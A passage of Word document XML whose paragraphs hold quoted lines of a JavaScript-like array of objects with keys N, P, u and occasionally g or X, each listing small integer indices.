        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53808AF8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 5, 177, 300, 336]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056029C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552EACE6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AABE0F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE1AB9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228157B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570ECB5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9C9E5A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73CE4B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 21, 159, 252, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BDE6CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4BC188" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C327A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C397BBD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544CE098" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24510661" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E84F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 6, 9, 11, 12, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EED2E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 7, 8, 10, 142, 152, 209, 299, 331]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D374A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DEF024" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AF8240" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 5, 7, 8, 9, 10, 12, 14, 15, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C249DAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 4, 6, 11, 13, 16, 20, 24, 32, 65, 133, 159, 203, 207, 225, 240, 241, 256, 296, 314, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C1DA2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBD282" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222776C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F03A66C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 5, 7, 8, 10, 12, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A14750C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 4, 6, 9, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDB11D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08486610" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C801827" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B6DAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B7A10" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03268717" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78193792" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75E169" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 7, 8, 11, 14, 15, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1755765A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 5, 6, 9, 10, 12, 13, 16, 20, 22, 26, 29, 38, 40, 42, 50, 159, 226, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA2240" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0DCFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B041F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB9D8CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [7, 10, 11, 18, 178, 249, 282, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF0B84" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A296EAA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528753F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CABF269" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F5FEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F6F92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B80C87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C584BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28821D81" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2A559" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E05BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF55FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5482B070" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B7973F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02322E92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3152FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 9, 27, 159, 168, 245, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31494D04" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C5729" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E48AF64" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D4D98" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231697E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CDA6DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508796D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 5, 6, 7, 8, 9, 10, 11, 16, 17, 18, 20, 22, 23, 24, 25, 26, 27, 29],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB1E002" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 4, 12, 13, 14, 15, 19, 21, 28, 30, 31, 33, 36, 37, 38, 39, 43, 45, 89, 106, 128, 159, 195, 317, 329]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEBB83E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440804C1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB3EFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9BAEA5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 8, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587E821" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E11208" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D80CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2B4F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 79]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4B9E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B99EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CCBA84" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661C343D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D03A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551919C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BB7C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D650A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE08D61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C8800" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A1F99" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B01E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3F1A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A5022" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28811899" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B995CCD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458A1FA8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED3B2F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [15, 9, 17, 19, 11, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E045B08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18251D65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [157, 159, 182, 196, 245, 311, 317, 342]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E57D36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19017270" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FE2CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC50C1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB2A8C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6001714B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32644162" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D1F19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0EDB66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E039F4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C038FF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5B5CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 14, 15, 23, 40, 219, 249, 277, 282, 283, 330, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390BEACA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B0A26" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09010137" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698514F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 14, 15, 18, 22, 23, 131, 159, 167, 262, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73EB44" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26153F96" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18351398" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D673D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 19, 33, 39, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE71C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F478A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00786316" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257DF053" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7975DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DABC990" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 16,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32605794" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 20, 17, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350CA06F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 19, 20],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407389BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 4, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77A8BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28916AC0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB9068A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CBE36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5A14FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
